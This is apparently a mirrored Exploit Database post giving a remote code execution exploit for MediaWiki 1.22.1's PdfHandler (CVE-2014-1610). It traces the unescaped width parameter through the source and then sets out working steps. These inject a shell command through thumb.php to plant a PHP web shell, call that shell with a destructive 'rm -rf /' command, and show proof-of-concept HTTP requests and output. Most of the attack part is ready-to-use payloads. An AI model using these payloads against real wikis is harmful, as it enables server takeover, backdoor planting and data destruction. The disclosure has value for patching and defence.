MediaWiki 1.22.1 PdfHandler – Remote Code Execution

• Exploit Database
• 21 阅读

• 作者： @u0x
  日期： 2014-02-01
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/31329/

• -----BEGIN PGP SIGNED MESSAGE-----
  Hash: SHA1
  
  ####################################################################
  #
  # MediaWiki <= 1.22.1 PdfHandler Remote Code Execution Exploit (CVE-2014-1610)
  # Reported by Netanel Rubin - Check Point’s Vulnerability Research Group (Jan 19, 2014)
  # Fixed in 1.22.2, 1.21.5 and 1.19.11 (Jan 30, 2014)
  # Affected website : Wikipedia.org and more !
  #
  # Exploit author : Xelenonz & @u0x (Pichaya Morimoto)
  # Release dates : Feb 1, 2014
  # Special Thanks to 2600 Thailand !
  #
  ####################################################################
  
  # Exploit:
  ####################################################################
  1. upload Longcat.pdf to wikimedia cms site (with PDF Handler enabled)
  http://vulnerable-site/index.php/Special:Upload
  2. inject os cmd to upload a php-backdoor
  http://vulnerable-site/thumb.php?f=Longcat.pdf&w=10|`echo%20
  "<?php%20system(\\$_GET[1]);">images/xnz.php`
  3. access to php-backdoor!
  http://vulnerable-site/images/xnz.php?1=rm%20-rf%20%2f%20--no-preserve-root
  4. happy pwning!!
  
  
  # Related files:
  ####################################################################
  thumb.php <-- extract all _GET array to params
  /extensions/PdfHandler/PdfHandler_body.php <-- failed to escape w/width
  options
  /includes/media/ImageHandler.php
  /includes/GlobalFunctions.php
  /includes/filerepo/file/File.php
  
  # Vulnerability Analysis:
  ####################################################################
  1. thumb.php
  This script used to resize images if it is configured to be done
  when the web browser requests the image
  <? ...
  1.1 Called directly, use $_GET params
  wfThumbHandleRequest();
  1.2 Handle a thumbnail request via query parameters
  function wfThumbHandleRequest() {
  $params = get_magic_quotes_gpc()
  ? array_map( 'stripslashes', $_GET )
  : $_GET; << WTF
  
  wfStreamThumb( $params ); // stream the thumbnail
  }
  1.3 Stream a thumbnail specified by parameters
  function wfStreamThumb( array $params ) {
  ...
  $fileName = isset( $params['f'] ) ? $params['f'] : ''; // << puts
  uploaded.pdf file here
  ...
  // Backwards compatibility parameters
  if ( isset( $params['w'] ) ) {
  $params['width'] = $params['w']; // << Inject os cmd here!
  unset( $params['w'] );
  }
  ...
  $img = wfLocalFile( $fileName );
  ...
  // Thumbnail isn't already there, so create the new thumbnail...
  $thumb = $img->transform( $params, File::RENDER_NOW ); // << resize image
  by width/height
  ...
  // Stream the file if there were no errors
  $thumb->streamFile( $headers );
  ...
  ?>
  2. /includes/filerepo/file/File.php
  <? ...
  function transform( $params, $flags = 0 ) { ...
  $handler = $this->getHandler(); // << PDF Handler
  ...
  $normalisedParams = $params;
  $handler->normaliseParams( $this, $normalisedParams );
  ...
  $thumb = $handler->doTransform( $this, $tmpThumbPath, $thumbUrl, $params );
  ..
  ?>
  3. /extensions/PdfHandler/PdfHandler_body.php
  <? ...
  function doTransform( $image, $dstPath, $dstUrl, $params, $flags = 0 ) {
  ...
  $width = $params['width'];
  ...
  $cmd = '(' . wfEscapeShellArg( $wgPdfProcessor ); // << craft shell cmd &
  parameters
  $cmd .= " -sDEVICE=jpeg -sOutputFile=- -dFirstPage={$page}
  -dLastPage={$page}";
  $cmd .= " -r{$wgPdfHandlerDpi} -dBATCH -dNOPAUSE -q ". wfEscapeShellArg(
  $srcPath );
  $cmd .= " | " . wfEscapeShellArg( $wgPdfPostProcessor );
  $cmd .= " -depth 8 -resize {$width} - "; // << FAILED to escape shell
  argument
  $cmd .= wfEscapeShellArg( $dstPath ) . ")";
  $cmd .= " 2>&1";
  ...
  $err = wfShellExec( $cmd, $retval );
  ...
  ?>
  4. /includes/GlobalFunctions.php
  Execute a shell command, with time and memory limits
  <? ...
  function wfShellExec( $cmd, &$retval = null, $environ = array(), $limits =
  array() ) {
  ...
  passthru( $cmd, $retval ); // << Execute here!!
  
  # Proof-Of-Concept
  ####################################################################
  GET /mediawiki1221/thumb.php?f=longcat.pdf&w=10|`echo%20%22%3C
  php%20system(\\$_GET[1]);%22%3Eimages/longcat.php`
  HTTP/1.1
  Host: 127.0.0.1
  Connection: keep-alive
  Accept:
  text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
  Accept-Encoding: gzip,deflate,sdch
  Accept-Language: en-US,en;q=0.8
  Cookie: my_wikiUserID=2; my_wikiUserName=Longcat;
  my_wiki_session=op3h2huvddnmg7gji0pscfsg02
  
  <html><head><title>Error generating thumbnail</title></head>
  <body>
  <h1>Error generating thumbnail</h1>
  <p>
  เกิดปัญหาไม่สามารถทำรูปย่อได้: /bin/bash: -: command not found<br />
  convert: option requires an argument `-resize' @
  error/convert.c/ConvertImageCommand/2380.<br />
  GPL Ghostscript 9.10: Unrecoverable error, exit code 1<br />
  
  </p>
  
  </body>
  </html>
  
  
  GET /mediawiki1221/images/longcat.php?1=id HTTP/1.1
  Host: 127.0.0.1
  Connection: keep-alive
  Accept:
  text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
  Accept-Encoding: gzip,deflate,sdch
  Accept-Language: en-US,en;q=0.8
  Cookie: my_wikiLoggedOut=1391266363; my_wikiUserID=2;
  my_wikiUserName=Longcat; my_wiki_session=bvg0n4o0sn6ug04lg26luqfcg1
  
  uid=33(www-data) gid=33(www-data) groups=33(www-data)
  
  
  # Back-end $cmd
  ####################################################################
  GlobalFunctions.php : wfShellExec()
  cmd = ('gs' -sDEVICE=jpeg -sOutputFile=- -dFirstPage=1 -dLastPage=1 -r150
  -dBATCH -dNOPAUSE -q '/var/www/mediawiki1221/images/2/27/Longcat.pdf' |
  '/usr/bin/convert' -depth 8 -resize 10|`echo "<?php
  system(\\$_GET[1]);">images/longcat.php` -
  '/tmp/transform_0e377aad0e27-1.jpg') 2>&1
  
  -----BEGIN PGP SIGNATURE-----
  Version: GnuPG v1.4.14 (GNU/Linux)
  
  iQIcBAEBAgAGBQJS7SLLAAoJEB2kHapd1XMU8BcP/A+hMUw/EDwChN+2XjtExVGU
  BzPrpXXBbp6WGWkeztmrT78Y1b1lXX/cQA4V9IGrdHUEdgG0p3y476d7eZ5sPxVf
  ny9Xg7o4WtMgmSvSOOc+lCsy9aAKab801cs1HLbwZokwK8ItwQQoGfik0BgNQ4l1
  mijELis1z1f3k6yJ9/OJicnIJDmHIzPL9wQyr2A5c+jjz74SR//SlQPrqDbvEpj2
  uCCpTpjf6LGYCzyGmqROlf+OxFTeXdB9oghButrEtQ9w6qGQg1/UZjmbx/xLkCqb
  GO1R4qs0PuV4uepwcbLzDDWW5kPejPjcwpuyjrpQO45OcIUtkvzR4iypCxxkvktv
  n2l09Dtn9HqbK3QXhTb2u3uhM9RyJd7kFKhfmZ85OnvMmYvaXSeDWs7Wd9GEO5wh
  FXbhL9O2u/bqiabQKnsJ6bx8hcm2a9mO+/yJZUyBXybHrjseRD4LQFWUYR/WPAQt
  vuICIQyO5pcjkIib+0DN4e7xcFMYuo3o6WkSZuZT+l0LwYDVmhUbaGAEP13+dWZZ
  M0HGoI7AITsqukYFH1n7NYjJazF3Bckc0iJbCrI39TYkvr3V9bRWSEfVBM6FcBan
  kumwDlzYP/301fsKGLtfsnUmK2qkj1EF3DVoJbZ5VFdgiUSlCMsbp9qdGfUPbelR
  2LmeyQR2rzjBB7Sovvcn
  =ooEs
  -----END PGP SIGNATURE-----